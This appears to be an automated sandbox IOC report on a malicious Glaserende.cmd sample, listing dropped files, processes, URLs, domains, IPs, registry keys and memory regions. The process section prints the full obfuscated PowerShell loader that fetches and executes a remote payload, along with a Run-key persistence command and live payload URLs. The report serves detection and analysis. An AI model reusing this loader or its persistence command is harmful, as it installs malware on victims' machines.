IOC Report
Glaserende.cmd


Files

File Path
Type
Category
Malicious
Download
Glaserende.cmd
ASCII text, with very long lines (4140), with no line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x01e02dcd, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\json[1].json
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30i3uxfb.vvq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2rzauu3.iw4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxbv0gsu.cyb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5v4zydp.4l4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BUXHK1ZJ6ID9ZXCS2SK3.temp
data
dropped
C:\Users\user\AppData\Roaming\stinko.Tet
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
6 more file entries are collapsed in the original report and are not listed here.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Glaserende.cmd" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. 
UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh aaTrgGlbAfuOlTTa=De(Frt Je,csMoTOv-U PPhAHoTFeh . Da$ Ae.lF AFCor .aImymy)') ;Afsvoret (Desperates 'St$toG,fLFaO MbR,A .l f:Dig .EN nI,A aN,rV eDon gdAnEInLCoSWoeEnn DSG =tu$MlgK lChO pb aaEflS :swsReeNolM,FslfSpuStl R+Ko+Bo% $.apUnRFoo sC LE,ed DU erUneOskI.AE Lr DHisRo. 
sC Sot.u rN .t') ;$Hepatic=$Procedurekalds[$Genanvendelsens]}$Tilbedt=471921;$Ungrated=28582;Afsvoret (Desperates 'Sa$gaG el hoChb saUtLdk:S,O.ePNok uaL sWaTFuE Tn rDFle s o o= B Seg UeP,TFi-LaC OGanOvTChE BNSktFl f $H e BFFyFPorO,A oY');Afsvoret (Desperates 'fo$BagdilSaoInb Ha Llvo:PaEAsnElwPrr a PpE pOmeA dF Fr=Hj [DyS ,y espytAdeS,mA..OpCtaoOznDev .eMar.otBu]Ci:Bi: rFC rReoU mMiBSeaTysteeAr6D 4 oS HtJorraiBanAbg P(,o$HuOBep kDaaGisUntRue Mn vdFoeSksSo)');Afsvoret (Desperates '.a$MigWhlP oRaB gAMaLko:skgP.g Pe Wk.oa SG Be aR,en eESwS.o D=Pi [.uS yM S mT,iE ,MPr.PotTieFeX Tkn.VrEBrn ICPaO DJeiPrNBoGMe]Al:,i:BeA .S PCSpICrIT .Nag ceB.TFasAptChr ,i.eNM GG (By$,eECaNV,W KrBeaAnPh PNaeEmDS )');Afsvoret (Desperates ' H$ gRelH O sB aN L ,:B c eRDao COk,k.vIShnLigBo= u$RygWhGReeSok EA DgpseRarN NCae.oSAt.W.S.su jbm SVitKuRS,IGrnFlg U( F$HkTLeIv.lSkbE EMaDtit a,Fo$uduP NKnGLarDeA,rT BeWodO,)');Afsvoret $Crooking;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. 
UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh aaTrgGlbAfuOlTTa=De(Frt Je,csMoTOv-U PPhAHoTFeh . Da$ Ae.lF AFCor .aImymy)') ;Afsvoret (Desperates 'St$toG,fLFaO MbR,A .l f:Dig .EN nI,A aN,rV eDon gdAnEInLCoSWoeEnn DSG =tu$MlgK lChO pb aaEflS :swsReeNolM,FslfSpuStl R+Ko+Bo% $.apUnRFoo sC LE,ed DU erUneOskI.AE Lr DHisRo. 
sC Sot.u rN .t') ;$Hepatic=$Procedurekalds[$Genanvendelsens]}$Tilbedt=471921;$Ungrated=28582;Afsvoret (Desperates 'Sa$gaG el hoChb saUtLdk:S,O.ePNok uaL sWaTFuE Tn rDFle s o o= B Seg UeP,TFi-LaC OGanOvTChE BNSktFl f $H e BFFyFPorO,A oY');Afsvoret (Desperates 'fo$BagdilSaoInb Ha Llvo:PaEAsnElwPrr a PpE pOmeA dF Fr=Hj [DyS ,y espytAdeS,mA..OpCtaoOznDev .eMar.otBu]Ci:Bi: rFC rReoU mMiBSeaTysteeAr6D 4 oS HtJorraiBanAbg P(,o$HuOBep kDaaGisUntRue Mn vdFoeSksSo)');Afsvoret (Desperates '.a$MigWhlP oRaB gAMaLko:skgP.g Pe Wk.oa SG Be aR,en eESwS.o D=Pi [.uS yM S mT,iE ,MPr.PotTieFeX Tkn.VrEBrn ICPaO DJeiPrNBoGMe]Al:,i:BeA .S PCSpICrIT .Nag ceB.TFasAptChr ,i.eNM GG (By$,eECaNV,W KrBeaAnPh PNaeEmDS )');Afsvoret (Desperates ' H$ gRelH O sB aN L ,:B c eRDao COk,k.vIShnLigBo= u$RygWhGReeSok EA DgpseRarN NCae.oSAt.W.S.su jbm SVitKuRS,IGrnFlg U( F$HkTLeIv.lSkbE EMaDtit a,Fo$uduP NKnGLarDeA,rT BeWodO,)');Afsvoret $Crooking;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)"

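URLs

Note: rows marked "unknown" with no IP next to them appear to be strings recovered from memory or files rather than observed connections. Several are stock example or documentation URLs (contoso.com, nuget.org, apache.org, Pester), and some are copies of the resolved URLs with trailing extraction junk (compare Glaserende.chm with Glaserende.chmP, or json.gp with json.gpCvC). Check each entry before using it as a blocking or detection indicator.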

Name
IP
Malicious
www.vzprojekti.com
malicious
www.porsche-augsbrug.de
malicious
http://nuget.org/NuGet.exe
unknown
https://www.aennaart.de/wpcontent/files/private/download/Glaserende.chmP
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://thevisionofenergy.de/wp-admin/css/colors/blue/dRzmPWAwIjx42.bin
85.13.130.155
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://aka.ms/pscore6lBLr
unknown
https://g.live.com/odclientsettings/ProdV2/C:
unknown
http://geoplugin.net/json.gpv
unknown
https://thevisionofenergy.de/wp-admin/css/colors/blue/dRzmPWAwIjx42.binokP_
unknown
https://www.aennaart.de/wpcontent/files/private/download/Glaserende.chmXR
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://g.live.com/odclientsettings/Prod/C:
unknown
https://www.aennaart.de/wpcontent/files/private/download/Glaserende.chm
217.160.0.61
https://thevisionofenergy.de/wp-admin/css/colors/blue/dRzmPWAwIjx42.binStofsHemwww.klueverimmo.de/wp
unknown
http://geoplugin.net/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://thevisionofenergy.de/
unknown
http://geoplugin.net/json.gpCvC
unknown
http://geoplugin.net/json.gp04Zvh
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.aennaart.de
unknown
https://www.aennaart.de
unknown
20 more URL entries are collapsed in the original report and are not listed here.

Domains

Name
IP
Malicious
www.vzprojekti.com
196.251.85.7
malicious
thevisionofenergy.de
85.13.130.155
www.aennaart.de
217.160.0.61
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
196.251.85.7
www.vzprojekti.com
Seychelles
malicious
85.13.130.155
thevisionofenergy.de
Germany
178.237.33.50
geoplugin.net
Netherlands
127.0.0.1
unknown
unknown
217.160.0.61
www.aennaart.de
Germany

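Registry

Note: three of the rows below form one persistence chain, which is also visible in the REG ADD command line under Processes. The Run value Mystery expands the per-user environment variable Sundhedstjeneste (HKEY_CURRENT_USER\Environment). It then reads the Noncooperation value under HKEY_CURRENT_USER\SOFTWARE\Rnefolk and appears to pass its content on for execution. Detection and cleanup should cover all three locations, not only the Run key.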

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rnefolk
Noncooperation
HKEY_CURRENT_USER\Environment
Sundhedstjeneste
HKEY_CURRENT_USER\SOFTWARE\Neleu8263scah-9YRWAH
exepath
HKEY_CURRENT_USER\SOFTWARE\Neleu8263scah-9YRWAH
licence
HKEY_CURRENT_USER\SOFTWARE\Neleu8263scah-9YRWAH
time
HKEY_CURRENT_USER\SOFTWARE\Neleu8263scah-9YRWAH
UID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Mystery
14 more registry entries are collapsed in the original report and are not listed here.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
8304000
heap
page read and write
malicious
82A6000
heap
page read and write
malicious
2B83000
heap
page read and write
malicious
832C000
heap
page read and write
malicious
1CDD977000
stack
page read and write
2A50000
heap
page read and write
1E6B21B0000
heap
page read and write
5B07000
trusted library allocation
page read and write
1E697F90000
heap
page read and write
2AE0000
direct allocation
page read and write
7FF9368D0000
trusted library allocation
page read and write
6F20000
direct allocation
page read and write
1E69BB18000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
80A0000
heap
page read and write
1E6B21D5000
heap
page read and write
1E699870000
heap
page readonly
1E699E50000
heap
page read and write
2E20000
trusted library allocation
page read and write
2E99000
heap
page read and write
7FF9367E6000
trusted library allocation
page read and write
7FF936A50000
trusted library allocation
page read and write
1B262513000
heap
page read and write
1E697E85000
heap
page read and write
1B267B02000
heap
page read and write
724A000
heap
page read and write
2A60000
direct allocation
page read and write
1B267950000
trusted library allocation
page read and write
2A90000
direct allocation
page read and write
2E80000
trusted library allocation
page execute and read and write
1E69A6BB000
trusted library allocation
page read and write
7580000
trusted library allocation
page read and write
1B267A55000
heap
page read and write
2DD4000
trusted library allocation
page read and write
2DDD000
trusted library allocation
page execute and read and write
1E6AA000000
trusted library allocation
page read and write
1B267921000
trusted library allocation
page read and write
8640000
trusted library allocation
page execute and read and write
2A20000
heap
page read and write
7FF9367E0000
trusted library allocation
page read and write
7FF936940000
trusted library allocation
page read and write
1E697E83000
heap
page read and write
1B262400000
heap
page read and write
1E69A984000
trusted library allocation
page read and write
1E69ADBD000
trusted library allocation
page read and write
1B263240000
trusted library allocation
page read and write
1B267A62000
heap
page read and write
FD087E000
unknown
page readonly
1B262517000
heap
page read and write
1B267C70000
trusted library allocation
page read and write
8270000
heap
page read and write
1E6B20D0000
heap
page read and write
A254000
direct allocation
page execute and read and write
53EE000
trusted library allocation
page read and write
1B267CC0000
remote allocation
page read and write
1E69ADA4000
trusted library allocation
page read and write
1B262490000
heap
page read and write
2E90000
heap
page read and write
1B267C30000
trusted library allocation
page read and write
5961000
trusted library allocation
page read and write
8E54000
direct allocation
page execute and read and write
7FF93673D000
trusted library allocation
page execute and read and write
1E6AA299000
trusted library allocation
page read and write
2D70000
heap
page read and write
7570000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
1B267900000
trusted library allocation
page read and write
1E699E24000
heap
page read and write
863E000
stack
page read and write
4950000
heap
page execute and read and write
1E699E11000
heap
page read and write
47DF000
stack
page read and write
715E000
stack
page read and write
4AB6000
trusted library allocation
page read and write
1B267989000
trusted library allocation
page read and write
1E69AECD000
trusted library allocation
page read and write
1E6A9FA0000
trusted library allocation
page read and write
71E9000
heap
page read and write
1E697E3D000
heap
page read and write
1E699860000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
2AA0000
heap
page read and write
6BE000
stack
page read and write
80C0000
trusted library allocation
page read and write
2D50000
direct allocation
page read and write
1E6B225E000
heap
page read and write
702000
heap
page read and write
1B262494000
heap
page read and write
7FF936A10000
trusted library allocation
page read and write
7257000
heap
page read and write
2B4F000
heap
page read and write
1B26242B000
heap
page read and write
489D000
stack
page read and write
1B267A70000
trusted library allocation
page read and write
7FF936950000
trusted library allocation
page read and write
2D30000
direct allocation
page read and write
2D20000
direct allocation
page read and write
1B267B06000
heap
page read and write
1B26245B000
heap
page read and write
467E000
stack
page read and write
AE47000
trusted library allocation
page read and write
FCFE8B000
stack
page read and write
7DF486450000
trusted library allocation
page execute and read and write
1CDD87E000
stack
page read and write
7510000
trusted library allocation
page execute and read and write
5B0D000
trusted library allocation
page read and write
1CDD6FE000
stack
page read and write
1B262473000
heap
page read and write
1B262F00000
trusted library allocation
page read and write
1E69A01C000
trusted library allocation
page read and write
2D10000
direct allocation
page read and write
1B267A2F000
heap
page read and write
7FF936AC0000
trusted library allocation
page read and write
1CDDA37000
stack
page read and write
1B262D13000
heap
page read and write
1E697E90000
heap
page read and write
27D8000
stack
page read and write
630000
heap
page read and write
FD0477000
stack
page read and write
1B262502000
heap
page read and write
1E6B229E000
heap
page read and write
6E0000
heap
page read and write
1B263480000
trusted library allocation
page read and write
1E69AE99000
trusted library allocation
page read and write
2E6E000
stack
page read and write
80E9000
trusted library allocation
page read and write
4910000
direct allocation
page read and write
1B267A43000
heap
page read and write
1E698010000
heap
page read and write
7FF936A70000
trusted library allocation
page read and write
1E697DA5000
heap
page read and write
7520000
trusted library allocation
page read and write
7FF936980000
trusted library allocation
page read and write
2CFE000
stack
page read and write
7FF936A20000
trusted library allocation
page read and write
1E6998B0000
trusted library allocation
page read and write
8660000
trusted library allocation
page read and write
1E697FD0000
heap
page read and write
2AA7000
heap
page read and write
1E699DB0000
heap
page read and write
4920000
direct allocation
page read and write
1B262529000
heap
page read and write
1B2623A0000
trusted library allocation
page read and write
80F0000
trusted library allocation
page read and write
8090000
heap
page read and write
1B267ADD000
heap
page read and write
7550000
trusted library allocation
page read and write
7FF936AA0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
48DC000
stack
page read and write
1E69ADB4000
trusted library allocation
page read and write
7FF936930000
trusted library allocation
page read and write
1E6998F0000
trusted library allocation
page read and write
7FF936990000
trusted library allocation
page read and write
6F30000
heap
page read and write
1CDE88D000
stack
page read and write
1CDD36E000
stack
page read and write
4961000
trusted library allocation
page read and write
1B267AF4000
heap
page read and write
827B000
heap
page read and write
471E000
stack
page read and write
1E69A533000
trusted library allocation
page read and write
1B262370000
heap
page read and write
2C10000
heap
page read and write
7FF936915000
trusted library allocation
page read and write
FD0F7B000
stack
page read and write
1B2624FF000
heap
page read and write
1E6B2268000
heap
page read and write
1E6B222C000
heap
page read and write
1B267922000
trusted library allocation
page read and write
7FF93674B000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
1B262D1A000
heap
page read and write
86F0000
trusted library allocation
page execute and read and write
1B262413000
heap
page read and write
8500000
trusted library allocation
page read and write
74ED000
stack
page read and write
2A80000
direct allocation
page read and write
5C4E000
trusted library allocation
page read and write
82C6000
heap
page read and write
1CDDAB9000
stack
page read and write
80D0000
trusted library allocation
page read and write
1B262D00000
heap
page read and write
1E698030000
heap
page read and write
6D0000
heap
page read and write
1B268000000
heap
page read and write
1B262C00000
heap
page read and write
721A000
heap
page read and write
2B10000
heap
page read and write
1CDE78F000
stack
page read and write
1CDDDBB000
stack
page read and write
2B88000
heap
page read and write
2D90000
trusted library section
page read and write
1CDD67E000
stack
page read and write
1B267AE9000
heap
page read and write
1E6AA27B000
trusted library allocation
page read and write
7FB7000
stack
page read and write
FD107E000
unknown
page readonly
1E6B229A000
heap
page read and write
75E0000
trusted library allocation
page read and write
7FF936960000
trusted library allocation
page read and write
2A70000
direct allocation
page read and write
84B0000
direct allocation
page read and write
59C8000
trusted library allocation
page read and write
276D000
stack
page read and write
1E6B20B0000
heap
page read and write
1B262502000
heap
page read and write
1E699940000
heap
page read and write
481E000
stack
page read and write
7FF936740000
trusted library allocation
page read and write
2D40000
direct allocation
page read and write
1E697D90000
heap
page read and write
2E05000
trusted library allocation
page execute and read and write
1E6B22A6000
heap
page read and write
1B262506000
heap
page read and write
FD0C7E000
unknown
page readonly
FD077E000
stack
page read and write
1B267AF1000
heap
page read and write
7223000
heap
page read and write
1B267A80000
trusted library allocation
page read and write
1B2624FF000
heap
page read and write
75D0000
trusted library allocation
page read and write
7FC0000
trusted library allocation
page execute and read and write
8254000
trusted library allocation
page read and write
251AD000
stack
page read and write
479E000
stack
page read and write
1E69AC4C000
trusted library allocation
page read and write
2F10000
heap
page read and write
808E000
stack
page read and write
49BF000
trusted library allocation
page read and write
2B80000
heap
page read and write
2DE9000
trusted library allocation
page read and write
1E699DC0000
heap
page read and write
1B267920000
trusted library allocation
page read and write
1B267F80000
trusted library allocation
page read and write
1CDE90A000
stack
page read and write
1B267EF0000
trusted library allocation
page read and write
2CE0000
direct allocation
page read and write
7FE0000
trusted library allocation
page read and write
1B267C00000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
6C0000
heap
page read and write
6F40000
heap
page read and write
71EB000
heap
page read and write
2CD000
stack
page read and write
75B0000
trusted library allocation
page read and write
7FF9369D0000
trusted library allocation
page read and write
1E697E57000
heap
page read and write
3CD000
stack
page read and write
1B267910000
trusted library allocation
page read and write
2E70000
heap
page readonly
7FF936920000
trusted library allocation
page execute and read and write
2AD0000
direct allocation
page read and write
1CDDC3E000
stack
page read and write
1CDD8FC000
stack
page read and write
1CDDCBE000
stack
page read and write
1B267CC0000
remote allocation
page read and write
726B000
heap
page read and write
2AC0000
direct allocation
page read and write
1E697E21000
heap
page read and write
2DD0000
trusted library allocation
page read and write
1E6B20A7000
heap
page execute and read and write
1E699E4E000
heap
page read and write
1B2624A0000
heap
page read and write
1CDDB39000
stack
page read and write
1E69A1BB000
trusted library allocation
page read and write
2E02000
trusted library allocation
page read and write
1B267950000
trusted library allocation
page read and write
1B26248E000
heap
page read and write
1B262D04000
heap
page read and write
2B6E000
stack
